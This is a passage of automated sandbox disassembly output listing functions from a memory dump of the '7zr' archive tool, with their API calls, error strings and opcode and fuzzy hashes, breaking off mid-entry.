                              • Part of subcall function 006E58BE: __EH_prolog.LIBCMT ref: 006E58C3
                            Strings
                            • Cannot seek to begin of file, xrefs: 006E610F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: Cannot seek to begin of file
                            • API String ID: 3519838083-2298593816
                            • Opcode ID: 8a4dc96ac6dae5cc8801a1cf28d1c3ac37270986c8c0bce0357394101a146ad6
                            • Instruction ID: e2edee41b007796564caaf12ccaec3e84fed0bbe4ecb329198bc3d4247fbc7b3
                            • Opcode Fuzzy Hash: 8a4dc96ac6dae5cc8801a1cf28d1c3ac37270986c8c0bce0357394101a146ad6
                            • Instruction Fuzzy Hash: 781221309013859FCF26DFA5C884BEEBBB7AF24304F14042EE44697392DB70AA85CB51
                            APIs
                            • __EH_prolog.LIBCMT ref: 00714E8F
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ClearH_prologVariantfree
                            • String ID: file
                            • API String ID: 904627215-2359244304
                            • Opcode ID: cac5580aea409479ec58540f5191576a322836cf475a2b8550a336aae0f07eb9
                            • Instruction ID: 6eb6aaefc5eccd56bc3e189d61999fba6c6a12cbce3d61b4efe66e7bc6a10bc8
                            • Opcode Fuzzy Hash: cac5580aea409479ec58540f5191576a322836cf475a2b8550a336aae0f07eb9
                            • Instruction Fuzzy Hash: CB128E30D00249EFCF15EFE8C985ADDBBB6AF59344F20406DE405AB292DB75AE85CB14
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F2CE0
                              • Part of subcall function 006D5E10: __EH_prolog.LIBCMT ref: 006D5E15
                              • Part of subcall function 006E41EC: _CxxThrowException.MSVCRT(?,00784A58), ref: 006E421A
                              • Part of subcall function 006D965D: VariantClear.OLEAUT32(?), ref: 006D967F
                            Strings
                            • Cannot create output directory, xrefs: 006F3070
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ClearExceptionThrowVariant
                            • String ID: Cannot create output directory
                            • API String ID: 814188403-1181934277
                            • Opcode ID: c544e28fa9edd412763080307b6a5d4c647923a98153bf0e96cc9f838ad13da9
                            • Instruction ID: 2d2ad22f52c389e3addbd1f250efdaec5051cabfee9e261786d98bef8e7d8ff4
                            • Opcode Fuzzy Hash: c544e28fa9edd412763080307b6a5d4c647923a98153bf0e96cc9f838ad13da9
                            • Instruction Fuzzy Hash: 89F16D70D0128EAFCF25EFA4C9A1AEDBBB6AF19300F1440AEE54567352DB309E45CB51
                            APIs
                            • fputs.MSVCRT ref: 0070C840
                              • Part of subcall function 006D25CB: _CxxThrowException.MSVCRT(?,00784A58), ref: 006D25ED
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowfputs
                            • String ID:
                            • API String ID: 1334390793-399585960
                            • Opcode ID: 01de07b85aac073b70af42cd1635e38a28933ffa7e5ec2dd3c818551f19e9fa8
                            • Instruction ID: e4edfd980cd8e8103042b336d9295873736398a0305928a88cdb11e1095bd549
                            • Opcode Fuzzy Hash: 01de07b85aac073b70af42cd1635e38a28933ffa7e5ec2dd3c818551f19e9fa8
                            • Instruction Fuzzy Hash: 2111C4716047449FDB16CF58C8D1BAAFBE6EF49304F04856EE1468B291C7B5BC44C764
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Open
                            • API String ID: 1795875747-71445658
                            • Opcode ID: 8a279a4b6288690e27f298353bcf56a7512af0bddd961e360b39820e6d135e00
                            • Instruction ID: 7153038ff54ae89d06811685832e81b85b88e0bb62e5705c25c66ead818f181e
                            • Opcode Fuzzy Hash: 8a279a4b6288690e27f298353bcf56a7512af0bddd961e360b39820e6d135e00
                            • Instruction Fuzzy Hash: B811BC32500704DFC760EF34D9A1ADABBE2EB24310B40862EE19A87252DA39A854CF54
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E58C3
                              • Part of subcall function 006D6C72: __EH_prolog.LIBCMT ref: 006D6C77
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$free
                            • String ID:
                            • API String ID: 2654054672-0
                            • Opcode ID: d094874f0ffce0359a60ef03a471d9616a2b3842ea85460186d051c2353fd125
                            • Instruction ID: 064c4bb5c02c16bbc5921a13ae47aa109de6e28dcd812b2d33c44f90e66ed245
                            • Opcode Fuzzy Hash: d094874f0ffce0359a60ef03a471d9616a2b3842ea85460186d051c2353fd125
                            • Instruction Fuzzy Hash: 06911431901685DFCF21EBA5C891AEEBBB3AF44348F20406EE843A7352DB319D45CB65
                            APIs
                            • __EH_prolog.LIBCMT ref: 007206B3
                            • _CxxThrowException.MSVCRT(?,0078D480), ref: 007208F2
                              • Part of subcall function 006D1E0C: malloc.MSVCRT ref: 006D1E1F
                              • Part of subcall function 006D1E0C: _CxxThrowException.MSVCRT(?,00784B28), ref: 006D1E39
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrow$H_prologmalloc
                            • String ID:
                            • API String ID: 3044594480-0
                            • Opcode ID: 4af947873f9ac12fac175b9bbd76aba6507c87d076d2be0bfe903385db5aa7d5
                            • Instruction ID: 3e5652ac9615c7fcc1c6d73d48ace17f6fda26a50fb8661586d4e3a104c2f62b
                            • Opcode Fuzzy Hash: 4af947873f9ac12fac175b9bbd76aba6507c87d076d2be0bfe903385db5aa7d5
                            • Instruction Fuzzy Hash: 33916E71D00259DFCF21DFA8D885AEEBBB5BF09304F144099E849A7252D734AE45CFA1
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 534434a814edb653c988d48d1b31bb04a9e95955f3b8187a1d7872153894ddbe
                            • Instruction ID: 7a3bd82378287612915ba2838a61a750b1f64add860cb76a7e410ff498df6026
                            • Opcode Fuzzy Hash: 534434a814edb653c988d48d1b31bb04a9e95955f3b8187a1d7872153894ddbe
                            • Instruction Fuzzy Hash: 0851917090AB809FDB65CF75C490AEABBF2BF45300F18885DE5DA4B202D731BA85DB50
                            APIs
                            • __EH_prolog.LIBCMT ref: 006F7B4D
                            • memcpy.MSVCRT(00000000,007927DC,00000000,00000000,?,?,00000000,00000000,00000000,00000002), ref: 006F7C65
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologmemcpy
                            • String ID:
                            • API String ID: 2991061955-0
                            • Opcode ID: af6296526d489974b45b0ee1dab9b8de92e87c5345d09396b8ade86fda2fe16f
                            • Instruction ID: 8b3cae81623df0b3be677f12ab0e4d7544d6ff693735431b3dd3613f49d98e0b
                            • Opcode Fuzzy Hash: af6296526d489974b45b0ee1dab9b8de92e87c5345d09396b8ade86fda2fe16f
                            • Instruction Fuzzy Hash: 9641687090421C9FCF20EFA4C951AEEB7F6BF14300F10446EE546A7392DB35AA0ACB55
                            APIs
                            • __EH_prolog.LIBCMT ref: 00721516
                              • Part of subcall function 007210D3: __EH_prolog.LIBCMT ref: 007210D8
                            • _CxxThrowException.MSVCRT(?,0078D480), ref: 00721561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: 237543759bcb20f793a4b53157749e01bcb1154e8eb9de0e6b1d9f7f8c06ef01
                            • Instruction ID: 1cf88482456e6c2ec88c81b10b1efc8917ce718b7cbaaba2401cecd42cee864e
                            • Opcode Fuzzy Hash: 237543759bcb20f793a4b53157749e01bcb1154e8eb9de0e6b1d9f7f8c06ef01
                            • Instruction Fuzzy Hash: EE01F272500288EEDF128F94D819BEF7FB8FF91350F44406AF8095A112C3B9E9A187A1
                            APIs
                            • __EH_prolog.LIBCMT ref: 00705800
                            • fputs.MSVCRT ref: 00705830
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prologfputcfputsfree
                            • String ID:
                            • API String ID: 195749403-0
                            • Opcode ID: 409d65270c61c3a2ccaaecad513aa022fa896f5975b96a78133ff0bb07082ac8
                            • Instruction ID: d35b77074880c3cd0478e05d3ea8844a5df7a3789b530f39d9b472bb46cb3b2f
                            • Opcode Fuzzy Hash: 409d65270c61c3a2ccaaecad513aa022fa896f5975b96a78133ff0bb07082ac8
                            • Instruction Fuzzy Hash: 81F03A32900508DBCB1AEBA4E8166DEBBB2EF04750F10842EE406A61D1CB795995CB88
                            APIs
                            • SysAllocStringLen.OLEAUT32(?,?), ref: 006D952C
                            • _CxxThrowException.MSVCRT(?,007855B8), ref: 006D954A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AllocExceptionStringThrow
                            • String ID:
                            • API String ID: 3773818493-0
                            • Opcode ID: 301c36f60c9b4fa9ad60171345b9784928fb13ff7d94e6c434932d7a64357c3f
                            • Instruction ID: 4c494d4f65f6a90360a7cf11194887a0eb7c9701160c1c308a856b30fbd92442
                            • Opcode Fuzzy Hash: 301c36f60c9b4fa9ad60171345b9784928fb13ff7d94e6c434932d7a64357c3f
                            • Instruction Fuzzy Hash: 8DF0C972650304ABC751EFA8D889D867BEDAF09780740846EF949CB711E779E8508B94
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$fputc
                            • String ID:
                            • API String ID: 1185151155-0
                            • Opcode ID: c01a988e797467757d9f04aea6ed6505c8c98caa95fb3fcd347c8df1c7c6936a
                            • Instruction ID: 46c8142fad76821aa9a772b701fb75b71299efd83cb7880f6b7067547a5af4e7
                            • Opcode Fuzzy Hash: c01a988e797467757d9f04aea6ed6505c8c98caa95fb3fcd347c8df1c7c6936a
                            • Instruction Fuzzy Hash: F4E08C37689110AFD61A2B98BC0185427D6DB8A365335012FEA40D32A0AB5B2D295BA8
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLast_beginthreadex
                            • String ID:
                            • API String ID: 4034172046-0
                            • Opcode ID: 4b090266e60036dc2708e2be85ea590ea9c00bec2846a7159341e5c47fb24f95
                            • Instruction ID: af5bee1ccab70f5218fb423061757b418e9a5c13d9b9037a3e84ca69afc6af3f
                            • Opcode Fuzzy Hash: 4b090266e60036dc2708e2be85ea590ea9c00bec2846a7159341e5c47fb24f95
                            • Instruction Fuzzy Hash: F3E0C2B2208202ABF3149B60DC06FB7729CEBA0B84F40847DFE46C6180E665CD00C3B5
                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,006D9C6E), ref: 006D9C52
                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 006D9C59
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrentMask
                            • String ID:
                            • API String ID: 1231390398-0
                            • Opcode ID: da49cd8bab844ee11b20922653466dd4ea6bce6b95e136d78fedab427803f566
                            • Instruction ID: f00e8fcc847a077cea32bab432311d632b3efb7d4b2760251970c86d7683fd47
                            • Opcode Fuzzy Hash: da49cd8bab844ee11b20922653466dd4ea6bce6b95e136d78fedab427803f566
                            • Instruction Fuzzy Hash: 1EB092B2400200EBCE119BA09D0CC563B2CAB082413008648B10DC2010C63AC085CBA8
                            APIs
                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 006DB843
                            • GetLastError.KERNEL32 ref: 006DB8AA
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorLastmemcpy
                            • String ID:
                            • API String ID: 2523627151-0
                            • Opcode ID: 8f17a7e518969ddbdbd88cd17bd3fd54093c25323e0838194437bc6a5bde9b8c
                            • Instruction ID: db20124d260e30a9703db9a84d66c1ae21205068e7c58eacb2e541d395bfd648
                            • Opcode Fuzzy Hash: 8f17a7e518969ddbdbd88cd17bd3fd54093c25323e0838194437bc6a5bde9b8c
                            • Instruction Fuzzy Hash: 32812631A00705DFDB64CE25C980AAAB7F7BF88314F166A2EE84687B48D734F8459B54
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionThrowmalloc
                            • String ID:
                            • API String ID: 2436765578-0
                            • Opcode ID: 5c9cfb2fccd9720d0adfce3002bda8aeeae5a1fe47f127ee0d3608618f727745
                            • Instruction ID: a03bb951699f477d5d14a8fd6d75c7df2ffbbfe36baa67c9304d6188b40be5bc
                            • Opcode Fuzzy Hash: 5c9cfb2fccd9720d0adfce3002bda8aeeae5a1fe47f127ee0d3608618f727745
                            • Instruction Fuzzy Hash: EAE08C7104024CBACF106FA0E8047D83F685B01395F40E026FD0C8E211C2B4C6D18744
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 89762319f8213e7232e3dfa4275d7a7c1f9be7116a7aca8b98b1146d08a58373
                            • Instruction ID: c3b9a1460374c24c28dcace110f916b811f07c31c7c61662399d3e946cb9b470
                            • Opcode Fuzzy Hash: 89762319f8213e7232e3dfa4275d7a7c1f9be7116a7aca8b98b1146d08a58373
                            • Instruction Fuzzy Hash: E9527170900249DFDF11CFA8C598BEDBBB5AF49304F28409DE845AB291DB79DE85CB21
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: c4bcde51a1748a7d4a88c62948bcea9d82fa344eb4f066156fc0a06a3eb1ac98
                            • Instruction ID: 0061b4ade90c1609bc54683229ec32a41bc3e5c66fcb0fc4bfc120c77d4eaec3
                            • Opcode Fuzzy Hash: c4bcde51a1748a7d4a88c62948bcea9d82fa344eb4f066156fc0a06a3eb1ac98
                            • Instruction Fuzzy Hash: A9F1BB70A067C5DFCF21CF65C490AEABBE2BF25344F14886EE49A8B351D730A944CB52
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: e9c3ffb555da391b3acd30526e2010a142cdcf4e9dec12960e84a037de4071de
                            • Instruction ID: 1488727b81285a2ea8dd14c9e321fa841d0513845d9ac48b80d711cf36ffdd5a
                            • Opcode Fuzzy Hash: e9c3ffb555da391b3acd30526e2010a142cdcf4e9dec12960e84a037de4071de
                            • Instruction Fuzzy Hash: 58D19B70A00755EFDB24CFA8D884BEEBBF2BF29300F50452DE85597652D778A885CB90
                            APIs
                            • __EH_prolog.LIBCMT ref: 0071CF96
                              • Part of subcall function 00721511: __EH_prolog.LIBCMT ref: 00721516
                              • Part of subcall function 00721511: _CxxThrowException.MSVCRT(?,0078D480), ref: 00721561
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$ExceptionThrow
                            • String ID:
                            • API String ID: 2366012087-0
                            • Opcode ID: a44e641b51ed112388252e2407d264c916f46361404a545f3cd85bb5363ab5ee
                            • Instruction ID: 061a05b6f5d07f9e0c7e3c7383662b667b7b2b4d3d859eb8d07604f6f1c92cc5
                            • Opcode Fuzzy Hash: a44e641b51ed112388252e2407d264c916f46361404a545f3cd85bb5363ab5ee
                            • Instruction Fuzzy Hash: 09514071900249DFCB21DFA8C8C8BDEBBB4AF49304F1444ADE45A97242C7799E85DF21
                            APIs
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: aba103a79465eb5672b73ed8929adf4ce324c91841cd7528e08f09534b391ff2
                            • Instruction ID: 64520d52f61245625499ef7082f9e83586bec81ebf7a39a41515db25ac72f90c
